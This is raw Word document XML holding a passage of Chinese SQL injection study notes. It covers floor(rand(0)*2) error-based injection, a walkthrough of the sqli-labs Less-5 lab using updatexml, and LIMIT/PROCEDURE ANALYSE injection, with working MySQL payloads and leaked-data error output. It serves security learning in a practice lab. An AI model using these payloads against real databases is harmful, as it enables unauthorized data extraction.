        <w:t>仍要插入，便造成了主键重复，从而报错。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6495AE9D" w14:textId="77777777" w:rsidR="00622949" w:rsidRDefault="00622949" w:rsidP="00352859"/>
    <w:p w14:paraId="0A679920" w14:textId="77777777" w:rsidR="00622949" w:rsidRPr="00622949" w:rsidRDefault="00622949" w:rsidP="00622949">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00622949">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>MySQL官方：查询的时候如果使用rand()的话，该值会被计算多次，在使用group by的时候，floor(rand(0)*2)会被执行一次，如果虚表不存在记录，插入虚表的时候会再被执行一次，最终会导致主键重复错误产生。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436A1AB2" w14:textId="77777777" w:rsidR="00622949" w:rsidRDefault="00622949" w:rsidP="00622949"/>
    <w:p w14:paraId="395EBD2F" w14:textId="23E54DF9" w:rsidR="00622949" w:rsidRPr="00622949" w:rsidRDefault="00622949" w:rsidP="00622949">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00622949">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>mysql&gt; select count(*) from users group by concat(version(),floor(rand(0)*2));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028C83E0" w14:textId="632880E2" w:rsidR="00622949" w:rsidRPr="00622949" w:rsidRDefault="00622949" w:rsidP="00622949">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00622949">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ERROR 1062 (23000): Duplicate entry '5.5.36-log1' for key 'group_key'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63ABED02" w14:textId="77777777" w:rsidR="00622949" w:rsidRPr="00622949" w:rsidRDefault="00622949" w:rsidP="00622949">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00622949">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>mysql&gt; select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B04E41" w14:textId="77777777" w:rsidR="00622949" w:rsidRPr="00622949" w:rsidRDefault="00622949" w:rsidP="00622949">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00622949">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>ERROR 1062 (23000): Duplicate entry '5.5.36-log1' for key 'group_key'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B6ED00" w14:textId="77777777" w:rsidR="00622949" w:rsidRPr="00622949" w:rsidRDefault="00622949" w:rsidP="00622949">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00622949">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>mysql&gt; select count(*) from users group by concat((select table_name from information_schema.tables limit</w:t>
      </w:r>
      <w:r w:rsidRPr="00667DD8">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0,1),':',floor(r</w:t>
      </w:r>
      <w:r w:rsidRPr="00622949">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>and(0)*2));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAF0D96" w14:textId="77777777" w:rsidR="00622949" w:rsidRPr="00622949" w:rsidRDefault="00622949" w:rsidP="00622949">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00622949">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>ERROR 1062 (23000): Duplicate entry 'CHARACTER_SETS:1' for key 'group_key'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A9259C" w14:textId="77777777" w:rsidR="00622949" w:rsidRPr="00622949" w:rsidRDefault="00622949" w:rsidP="00622949">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00622949">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t xml:space="preserve">mysql&gt; select count(*),concat((select table_name from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59149DB9" w14:textId="77777777" w:rsidR="00622949" w:rsidRPr="00622949" w:rsidRDefault="00622949" w:rsidP="00622949">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00622949">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>ERROR 1062 (23000): Duplicate entry 'CHARACTER_SETS1' for key 'group_key'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F3AA10" w14:textId="77777777" w:rsidR="00622949" w:rsidRPr="00622949" w:rsidRDefault="00622949" w:rsidP="00622949">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00622949">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>mysql&gt; select count(*) from information_schema.tables group by concat((select concat(table_schema,':',table_name) from information_schema.tables limit 0,1),floor(rand(0)*2));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B300C1" w14:textId="37C5257C" w:rsidR="00622949" w:rsidRDefault="00622949" w:rsidP="00622949">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00622949">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>ERROR 1062 (23000): Duplicate entry 'information_schema:CHARACTER_SETS1' for key 'group_key'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7538B63D" w14:textId="4F29A90E" w:rsidR="002F1730" w:rsidRDefault="002A2E19" w:rsidP="00571E46">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A2E19">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>例题：sqli</w:t>
      </w:r>
      <w:r w:rsidRPr="002A2E19">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>-labs less5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4759E0" w14:textId="3020BE1D" w:rsidR="002A2E19" w:rsidRDefault="00AD3C2D" w:rsidP="00571E46">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="732A3680" wp14:editId="043A9D22">
            <wp:extent cx="5274310" cy="14071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C29F" w14:textId="5556889E" w:rsidR="002A2E19" w:rsidRDefault="002A2E19" w:rsidP="00571E46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1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="002A2E19">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>判断</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>注入点闭合类型为单引号</w:t>
      </w:r>
      <w:r w:rsidR="007702C5">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FE01BF" w14:textId="55E09F34" w:rsidR="002A2E19" w:rsidRDefault="0059184B" w:rsidP="00571E46">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3593323A" wp14:editId="3A57D058">
            <wp:extent cx="5274310" cy="1410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6E07" w14:textId="2AD1FFFE" w:rsidR="0059184B" w:rsidRDefault="0059184B" w:rsidP="00571E46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2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>order</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>判断列数为3</w:t>
      </w:r>
      <w:r w:rsidR="007702C5">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C54957" w14:textId="735E18B6" w:rsidR="0059184B" w:rsidRDefault="0059184B" w:rsidP="00571E46">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BE6E1D8" wp14:editId="08D85DD7">
            <wp:extent cx="5274310" cy="14128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1D0A" w14:textId="31EB4C11" w:rsidR="0059184B" w:rsidRDefault="0059184B" w:rsidP="00571E46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/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>试图用</w:t>
      </w:r>
      <w:r w:rsidRPr="0059184B">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>'union select 1,2,3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>判断回显点，发现没有回显点，无法使用联合查询注入。但在之前的尝试中发现界面仍会返回报错信息，故尝试采用报错注入</w:t>
      </w:r>
      <w:r w:rsidR="007702C5">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402EA676" w14:textId="445091FA" w:rsidR="0059184B" w:rsidRDefault="000B3979" w:rsidP="00571E46">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BF51ACF" wp14:editId="070C6A69">
            <wp:extent cx="5274310" cy="11703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944C" w14:textId="32C24547" w:rsidR="0059184B" w:rsidRDefault="000B3979" w:rsidP="00571E46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4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>构造大整数溢出，但是注入语句没得到执行</w:t>
      </w:r>
      <w:r w:rsidR="003C1C94">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00F05A4A">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>尝试</w:t>
      </w:r>
      <w:r w:rsidR="00F05A4A" w:rsidRPr="00F05A4A">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>updatexml</w:t>
      </w:r>
      <w:r w:rsidR="00F05A4A">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>()函数</w:t>
      </w:r>
      <w:r w:rsidR="007702C5">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57028356" w14:textId="5650F029" w:rsidR="0059184B" w:rsidRDefault="007702C5" w:rsidP="00571E46">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A1A3B65" wp14:editId="3D5A0A14">
            <wp:extent cx="5274310" cy="1087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5600" w14:textId="20C7F9AE" w:rsidR="0059184B" w:rsidRDefault="007702C5" w:rsidP="00571E46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5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>成功爆出表名；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B02053" w14:textId="7DBA9940" w:rsidR="0059184B" w:rsidRDefault="00CB1472" w:rsidP="00571E46">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A961CA4" wp14:editId="36F8D072">
            <wp:extent cx="5274310" cy="10775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F034" w14:textId="250D352E" w:rsidR="007702C5" w:rsidRDefault="00CB1472" w:rsidP="00571E46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6.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>查看表 users的字段名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BDF331" w14:textId="353791A2" w:rsidR="00CB1472" w:rsidRDefault="00B9353D" w:rsidP="00571E46">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FDAB9C3" wp14:editId="280295BA">
            <wp:extent cx="5274310" cy="10464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941A" w14:textId="7A65E80D" w:rsidR="007702C5" w:rsidRDefault="00B9353D" w:rsidP="00571E46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7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.爆字段值成功，但发现回显不完整，得知</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9353D">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>updatexml最多只能显示32位，需要配合SUBSTR</w:t>
      </w:r>
      <w:r w:rsidR="00BA066F">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>和limit控制输出</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9353D">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidR="00BA066F">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>。至此该题结束。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3284263F" w14:textId="12BC0B8B" w:rsidR="00BA066F" w:rsidRDefault="00BA066F" w:rsidP="00571E46">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="029C8607" w14:textId="77777777" w:rsidR="00B04F94" w:rsidRPr="001302AE" w:rsidRDefault="00447770" w:rsidP="001302AE">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001302AE">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="006D73B2" w:rsidRPr="001302AE">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="001302AE">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006D73B2" w:rsidRPr="001302AE">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>limit注入</w:t>
      </w:r>
      <w:r w:rsidR="0084547D" w:rsidRPr="001302AE">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="53138001" w14:textId="7E399881" w:rsidR="00BA066F" w:rsidRPr="001302AE" w:rsidRDefault="0084547D" w:rsidP="001302AE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001302AE">
        <w:t>5.0.0&lt; MySQL &lt;5.6.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C01E38B" w14:textId="40849011" w:rsidR="00BA066F" w:rsidRDefault="00447770" w:rsidP="00571E46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1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00447770">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00447770">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="00447770">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> order by 关键字</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295F8052" w14:textId="77777777" w:rsidR="00447770" w:rsidRPr="00447770" w:rsidRDefault="00447770" w:rsidP="00447770">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00447770">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>这种情况下的</w:t>
      </w:r>
      <w:r w:rsidRPr="00447770">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> limit 后面可以使用union进行联合查询注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3897AACF" w14:textId="4FCA9AF0" w:rsidR="00447770" w:rsidRDefault="00447770" w:rsidP="00447770">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00447770">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>执行语句</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6EA716" w14:textId="6892F891" w:rsidR="007702C5" w:rsidRPr="00447770" w:rsidRDefault="00447770" w:rsidP="00571E46">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00447770">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>select id from users limit 0,1 union select username from users;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3385CC97" w14:textId="4D3E25E5" w:rsidR="007702C5" w:rsidRDefault="0084547D" w:rsidP="00571E46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2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0084547D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0084547D">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>存在</w:t>
      </w:r>
      <w:r w:rsidRPr="0084547D">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> order by 关键字</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64409B94" w14:textId="5181DE11" w:rsidR="0084547D" w:rsidRDefault="0084547D" w:rsidP="00571E46">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0084547D">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>此时后面再次使用</w:t>
      </w:r>
      <w:r w:rsidRPr="0084547D">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>union将会报错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E311082" w14:textId="58BCC6B9" w:rsidR="0084547D" w:rsidRDefault="001302AE" w:rsidP="00571E46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l</w:t>
      </w:r>
      <w:r w:rsidRPr="001302AE">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>imit 关键字后面还可跟PROCEDURE和 INTO两个关键字，但是 INTO 后面写入文件需要知道绝对路径以及写入shell的权限，因此利用比较难，因此这里以PROCEDURE为例进行注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6712C318" w14:textId="77777777" w:rsidR="001302AE" w:rsidRDefault="001302AE" w:rsidP="001302AE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lastRenderedPageBreak/>
        <w:t>例如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF24CDC" w14:textId="720C908F" w:rsidR="001302AE" w:rsidRPr="001302AE" w:rsidRDefault="001302AE" w:rsidP="001302AE">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001302AE">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>mysql&gt; select id from users order by id desc limit 0,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2095A6" w14:textId="7D853E9F" w:rsidR="001302AE" w:rsidRPr="001302AE" w:rsidRDefault="001302AE" w:rsidP="001302AE">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001302AE">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>ERROR 1105 (HY000): XPATH syntax error: ':5.5.53'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>爆出版本信息</w:t>
      </w:r>
    </w:p>
